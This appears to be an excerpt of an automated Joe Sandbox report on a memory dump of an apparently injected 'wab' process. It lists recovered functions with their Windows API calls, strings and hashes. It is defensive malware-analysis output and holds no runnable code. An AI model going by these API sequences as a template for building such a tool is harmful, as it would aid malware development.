                                                  • Source File: 0000000B.00000002.3089029097.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: memset
                                                  • String ID: BINARY
                                                  • API String ID: 2221118986-907554435
                                                  • Opcode ID: 791c3fd1504af4fac70d2b15fe323b793bb873d26b5eb9345bfe372344e0595c
                                                  • Instruction ID: 089a0534c11c2c8a1092ab46fa13594887108ded84822111f9e073e703b485f9
                                                  • Opcode Fuzzy Hash: 791c3fd1504af4fac70d2b15fe323b793bb873d26b5eb9345bfe372344e0595c
                                                  • Instruction Fuzzy Hash: 41518B71A047059FDB21CF69C881BEA7BE4EF48350F14446AF849CB342E738D995CBA9
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                    • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT ref: 0040ECF9
                                                    • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT ref: 0040EDC0
                                                  • GetStdHandle.KERNEL32(000000F5), ref: 00410530
                                                  • FindCloseChangeNotification.KERNELBASE(?), ref: 00410654
                                                    • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                                    • Part of subcall function 0040973C: GetLastError.KERNEL32 ref: 00409750
                                                    • Part of subcall function 0040973C: _snwprintf.MSVCRT ref: 0040977D
                                                    • Part of subcall function 0040973C: MessageBoxW.USER32(?,?,Error,00000030), ref: 00409796
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3089029097.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: ??2@??3@ChangeCloseCreateErrorFileFindHandleLastMessageNotification_snwprintf
                                                  • String ID:
                                                  • API String ID: 1161345128-0
                                                  • Opcode ID: 331637186d7fda146188de6d28ea3842bad20729486783243114fed48956b45e
                                                  • Instruction ID: c777e68e994987bb064ab7fb99de871126f79ef1b866bcb434911d427814d160
                                                  • Opcode Fuzzy Hash: 331637186d7fda146188de6d28ea3842bad20729486783243114fed48956b45e
                                                  • Instruction Fuzzy Hash: BE417231A00204EFCB25AF65C885A9E77B6EF84711F20446FF446A7291C7B99EC0DE59
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3089029097.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: _wcsicmp
                                                  • String ID: /stext
                                                  • API String ID: 2081463915-3817206916
                                                  • Opcode ID: e32263b5b8ee2531379a68aaf94d61f4c2e86babe20e9cb478eb73a56fae033c
                                                  • Instruction ID: 10e6e7fbaeb1b3fbdbf907bfc38f809d5841ace5bac79d7196eddb000c1bc607
                                                  • Opcode Fuzzy Hash: e32263b5b8ee2531379a68aaf94d61f4c2e86babe20e9cb478eb73a56fae033c
                                                  • Instruction Fuzzy Hash: 19218E30B00605AFD704EF6ACAC1AD9F7A9FF44304F10416AA419D7342DB79ADA18B95
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                    • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                  • GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                    • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                    • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                    • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB63
                                                    • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB88
                                                  • FindCloseChangeNotification.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                                    • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT ref: 0040B052
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3089029097.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: File$ByteCharMultiWide$??2@??3@ChangeCloseCreateFindNotificationReadSize
                                                  • String ID:
                                                  • API String ID: 159017214-0
                                                  • Opcode ID: 5551154f09d9ac0fe1cac7a20b9391cb02a4855cbb9d966ae120c46d578013b8
                                                  • Instruction ID: dc8783d9a6c7baf78a377756874cfbd60b78407a6d3acdf6d1052ad5173bbb79
                                                  • Opcode Fuzzy Hash: 5551154f09d9ac0fe1cac7a20b9391cb02a4855cbb9d966ae120c46d578013b8
                                                  • Instruction Fuzzy Hash: 91118275804208AFDB10AF6ADC45C8A7F75FF01364711C27AF525A72A1D6349A18CBA5
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                    • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                    • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                    • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                    • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                    • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                    • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                  • GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                  • FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3089029097.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                                  • String ID:
                                                  • API String ID: 3150196962-0
                                                  • Opcode ID: e13bd3a8970da8505fcd32bc3817dd57930a815364b2861f31204fc1a755a47e
                                                  • Instruction ID: e973b1bd6c29085855c002f2d91bff7161adaf38cfdf5e3d51a6561f1cc66020
                                                  • Opcode Fuzzy Hash: e13bd3a8970da8505fcd32bc3817dd57930a815364b2861f31204fc1a755a47e
                                                  • Instruction Fuzzy Hash: D90192B1100211AAD6319FA6CC04D1BFAE9EFC0750B20883FF1D9E25A0D7B49881DB69
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Strings
                                                  • failed to allocate %u bytes of memory, xrefs: 004152F0
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3089029097.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: malloc
                                                  • String ID: failed to allocate %u bytes of memory
                                                  • API String ID: 2803490479-1168259600
                                                  • Opcode ID: 5362f241c04528c046f9391a2b70be4ceaf2b9bead8481f91e416c113c2d710c
                                                  • Instruction ID: 101c51dc2fc609bd9d1e0073b1fda66f00508c6688545faad3e4fa21ce9dc4bd
                                                  • Opcode Fuzzy Hash: 5362f241c04528c046f9391a2b70be4ceaf2b9bead8481f91e416c113c2d710c
                                                  • Instruction Fuzzy Hash: 11E0DFB7B02A12A3C200561AED01AC667959FC122572B013BF92CD3681E638D89687A9
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3089029097.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: ??3@
                                                  • String ID:
                                                  • API String ID: 613200358-0
                                                  • Opcode ID: cbd9f9e03ce833727f217058398efad0a096bf54ba10072877aeedcd786ebb4c
                                                  • Instruction ID: 7f33cc2486ffea160e999b9abaf125df84647c5341351ad01334bd221cd3bada
                                                  • Opcode Fuzzy Hash: cbd9f9e03ce833727f217058398efad0a096bf54ba10072877aeedcd786ebb4c
                                                  • Instruction Fuzzy Hash: 32D042B0404B008ED7B0DF39D401602BBF0AB093143118D2E90AAC2A50E775A0149F08
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3089029097.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: memcmpmemset
                                                  • String ID:
                                                  • API String ID: 1065087418-0
                                                  • Opcode ID: c380604b195766abe84e73715a049d0373e74049267bc02831dab12048305386
                                                  • Instruction ID: cf105cae5e27f97c9cd1c3f46a8d5e16e2707a712041142e317bfb3d1f631299
                                                  • Opcode Fuzzy Hash: c380604b195766abe84e73715a049d0373e74049267bc02831dab12048305386
                                                  • Instruction Fuzzy Hash: 2A615B71A01349EBDB14EFA495815EEB7B4EB04308F1440AFE609D3241E738AED4DB99
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3089029097.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: memcpymemset
                                                  • String ID:
                                                  • API String ID: 1297977491-0
                                                  • Opcode ID: b6c8b344e63531bca6e6aefc5e8eb99709ec7ba8fcdd06e77ba93d6293000e49
                                                  • Instruction ID: 4c6ebae2fd17f46eb6a701b53e5b2159fa076c350f721ddb3a961165d25aeca7
                                                  • Opcode Fuzzy Hash: b6c8b344e63531bca6e6aefc5e8eb99709ec7ba8fcdd06e77ba93d6293000e49
                                                  • Instruction Fuzzy Hash: F331BE72A00214EBDF10DF59C881A9EB7B4EF48714F24959AE804AF242C775EE41CB98
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                    • Part of subcall function 00403A16: memset.MSVCRT ref: 00403A55
                                                    • Part of subcall function 0040A02C: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                                                    • Part of subcall function 0040A02C: GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                                    • Part of subcall function 0040A02C: FindCloseChangeNotification.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004455D5), ref: 0040A061
                                                  • CompareFileTime.KERNEL32(?,?,00000000,?,00000000), ref: 004039D4
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3089029097.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: File$Time$ChangeCloseCompareCreateFindNotificationmemset
                                                  • String ID:
                                                  • API String ID: 1481295809-0
                                                  • Opcode ID: 56a49437465c6dd79f718b685576690655c489aaf9a54b49d185ed9555da5ee2
                                                  • Instruction ID: d476be81a684c5cf971044fbd14bb177a9e73989d843208b34704cc982626f94
                                                  • Opcode Fuzzy Hash: 56a49437465c6dd79f718b685576690655c489aaf9a54b49d185ed9555da5ee2
                                                  • Instruction Fuzzy Hash: 11111CB6D00218ABCB11EFA5D9415DEBBB9EF44315F20407BE841F7281DA389F45CB95
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                    • Part of subcall function 004135E0: FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                                                    • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                    • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                    • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                    • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                    • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                    • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                  • GetProcAddress.KERNEL32(?,00000000), ref: 0041362A
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3089029097.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                                  • String ID:
                                                  • API String ID: 3150196962-0
                                                  • Opcode ID: 102e9bd218bff8034664a90f9159d5d227e7736aeb8d0cece17e8d9bf5f2cb6a
                                                  • Instruction ID: 35a9ad0fe6b4507ee66bae46934dcfd2e139bf0842d10804986ce3ee8b034d80
                                                  • Opcode Fuzzy Hash: 102e9bd218bff8034664a90f9159d5d227e7736aeb8d0cece17e8d9bf5f2cb6a
                                                  • Instruction Fuzzy Hash: BBF0A4311447126AE6306B7AAC02BE762849F00725F10862EB425D55D1EFA8D5C046AC
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • SetFilePointerEx.KERNELBASE(0040627C,?,?,00000000,00000000,00000000,004068F9,00000000,00000000,?,00000000,0040627C), ref: 004062C2
                                                    • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3089029097.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: File$PointerRead
                                                  • String ID:
                                                  • API String ID: 3154509469-0
                                                  • Opcode ID: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                                                  • Instruction ID: d794e9b43e5f56b2d2e2073d65b81241c22a9a75ad02cc9b2284f18e77a2fe0f
                                                  • Opcode Fuzzy Hash: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                                                  • Instruction Fuzzy Hash: 45E01276100100FFE6619B05DC06F57FBB9FBD4710F14883DB59596174C6326851CB25
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • GetPrivateProfileIntW.KERNEL32(?,?,?,?), ref: 00414588
                                                    • Part of subcall function 004143F1: memset.MSVCRT ref: 00414410
                                                    • Part of subcall function 004143F1: _itow.MSVCRT ref: 00414427
                                                    • Part of subcall function 004143F1: WritePrivateProfileStringW.KERNEL32(?,?,00000000), ref: 00414436
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3089029097.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: PrivateProfile$StringWrite_itowmemset
                                                  • String ID:
                                                  • API String ID: 4232544981-0
                                                  • Opcode ID: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                                                  • Instruction ID: 104e910b762de94586eb11e4c264cf061db1895f8dce3fe8c281d71359574313
                                                  • Opcode Fuzzy Hash: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                                                  • Instruction Fuzzy Hash: 8EE09232000209ABDF125F91EC01AA93B66FF54315F548469F95C05520D33295B0AB59
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • FreeLibrary.KERNELBASE(?,?,004452FB,?,?,?,0040333C,?), ref: 00444A65
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3089029097.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: FreeLibrary
                                                  • String ID:
                                                  • API String ID: 3664257935-0
                                                  • Opcode ID: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
                                                  • Instruction ID: 9043d1e372537a54137ae43dcd20834ee918eeaa55a47e8e1dedab4d47514996
                                                  • Opcode Fuzzy Hash: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
                                                  • Instruction Fuzzy Hash: E2E0F6B5900B018FD3708F1BE944406FBF8BFE56113108A1FD4AAC2A24D7B4A1898F54
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                    • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00413F6F
                                                    • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
                                                    • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
                                                    • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
                                                    • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
                                                  • K32GetModuleFileNameExW.KERNEL32(00000104,00000000,00413E1F,00000104,00413E1F,00000000,?), ref: 00413F46
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3089029097.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: AddressProc$FileModuleName
                                                  • String ID:
                                                  • API String ID: 3859505661-0
                                                  • Opcode ID: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                                  • Instruction ID: eb737a8a997ed41d0f7a348c178ce8d4b8225706e43eb580f21eee6dbde26bc7
                                                  • Opcode Fuzzy Hash: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                                  • Instruction Fuzzy Hash: 6FD02231B083007BEA20EE70CC00FCBA2F47F40F12F008C5AB191D2080C374C9495305
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3089029097.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: FileRead
                                                  • String ID:
                                                  • API String ID: 2738559852-0
                                                  • Opcode ID: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                                                  • Instruction ID: df780c2d30ec27a436fe2e8938b9b3026ee6fdf868a35847a3a0dbf755fefbc9
                                                  • Opcode Fuzzy Hash: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                                                  • Instruction Fuzzy Hash: 6DD0C97505020DFBDF01CF81DC06FDD7B7DFB05359F108054BA0095060C7759A15AB55
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • WriteFile.KERNELBASE(?,00000009,?,00000000,00000000,?,?,00402F9B,?,00000000,00000000,00000000,0000017E), ref: 0040A325
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3089029097.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: FileWrite
                                                  • String ID:
                                                  • API String ID: 3934441357-0
                                                  • Opcode ID: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                                                  • Instruction ID: 3280266517864b8de079c100525e5277478ec149926fcdeece843fe2c70d8c86
                                                  • Opcode Fuzzy Hash: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                                                  • Instruction Fuzzy Hash: CFD0C93501020DFBDF01CF81DC06FDD7BBDFB04359F108054BA1095060D7B59A20AB94
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • FreeLibrary.KERNELBASE(00000000,004457F2,00000000,000001F7,00000000), ref: 00413D30
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3089029097.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: FreeLibrary
                                                  • String ID:
                                                  • API String ID: 3664257935-0
                                                  • Opcode ID: 4aed56dde2bff02888507ea152729a1ee15f70291d16ca6bd798c1e7fc2ec88c
                                                  • Instruction ID: 8f6381f957debc367d4a0444659be52de1bfd3a154b3998764173f6a98a011bd
                                                  • Opcode Fuzzy Hash: 4aed56dde2bff02888507ea152729a1ee15f70291d16ca6bd798c1e7fc2ec88c
                                                  • Instruction Fuzzy Hash: 1DD0C9765002229BDB10AF26EC057857378FF00712B110425E810B7594D778BEE68ADC
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3089029097.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: ??3@
                                                  • String ID:
                                                  • API String ID: 613200358-0
                                                  • Opcode ID: 064fc9ad2ab7598503b0803575f79bda8c80cd2f5cc7d751fc92f1905ed38621
                                                  • Instruction ID: 84c58710a9e867f17c2d1ed9f7495b278bdfae561cd9e9721482330d0bfefd66
                                                  • Opcode Fuzzy Hash: 064fc9ad2ab7598503b0803575f79bda8c80cd2f5cc7d751fc92f1905ed38621
                                                  • Instruction Fuzzy Hash: 48C00272510B018FEB209E16C405762B3E4AF5173BF928C1D949591481D77CE4448A1D
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3089029097.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: CreateFile
                                                  • String ID:
                                                  • API String ID: 823142352-0
                                                  • Opcode ID: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
                                                  • Instruction ID: 15e4bfb1af8ab284213ec8af4af1ca3ed9a3c322684c6da9746693c795416a08
                                                  • Opcode Fuzzy Hash: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
                                                  • Instruction Fuzzy Hash: A8C092B0280200BEFE224B10EC15F36755CE744700F2008247E40F40E0C1605E108524
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3089029097.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: CreateFile
                                                  • String ID:
                                                  • API String ID: 823142352-0
                                                  • Opcode ID: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
                                                  • Instruction ID: 13aef0f41518da9c32968a96bed17b980f0e8f352a8d1793a660c4ee04e7d177
                                                  • Opcode Fuzzy Hash: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
                                                  • Instruction Fuzzy Hash: B8C012F02903007EFF204B10AC0AF37755DF784700F2048207E40F40E1C2B15C008524
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3089029097.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: ??3@
                                                  • String ID:
                                                  • API String ID: 613200358-0
                                                  • Opcode ID: 724fdfa704f09a621e121349248af22099a797a76fc60927f41904971c9b5f98
                                                  • Instruction ID: 146ea39d6618054f0b1de7ea1636ea0e57db3b52e0d7afa8327ef8e2ad9437d0
                                                  • Opcode Fuzzy Hash: 724fdfa704f09a621e121349248af22099a797a76fc60927f41904971c9b5f98
                                                  • Instruction Fuzzy Hash: 18C012B29107018BFB308E15C409322B2E4AF0072BFA18C0D9090910C2C77CD080CA18
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3089029097.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: ??3@
                                                  • String ID:
                                                  • API String ID: 613200358-0
                                                  • Opcode ID: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                                                  • Instruction ID: 6ff791ec813821c2e9e24527ebed0d702daabad41f6d5d50af9b89e3d4ad0470
                                                  • Opcode Fuzzy Hash: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                                                  • Instruction Fuzzy Hash: ADC09BB15117014BE7305F15D40471373D49F11727F318C1DA5D1914C2D77CD4408518
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3089029097.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: FreeLibrary
                                                  • String ID:
                                                  • API String ID: 3664257935-0
                                                  • Opcode ID: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
                                                  • Instruction ID: 97b2006ec1e2dd28fddd19cbcf35086f2a6b1d7d6d8af37d8808782836c913ed
                                                  • Opcode Fuzzy Hash: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
                                                  • Instruction Fuzzy Hash: C1C04C355107129BE7318F22C849793B3E8BB00767F40C818A56A85454D7BCE594CE28
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • EnumResourceNamesW.KERNELBASE(?,?,Function_000148B6,00000000), ref: 0041494B
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3089029097.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: EnumNamesResource
                                                  • String ID:
                                                  • API String ID: 3334572018-0
                                                  • Opcode ID: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
                                                  • Instruction ID: 4cd0fc1a45efe5f4a77ff86a676eea9814a6d41529a344ef69fdb726e0e13cac
                                                  • Opcode Fuzzy Hash: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
                                                  • Instruction Fuzzy Hash: 5CC09B355943819FD711DF108C05F1A76D5BF95705F104C397151940A0C7614014A60A
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

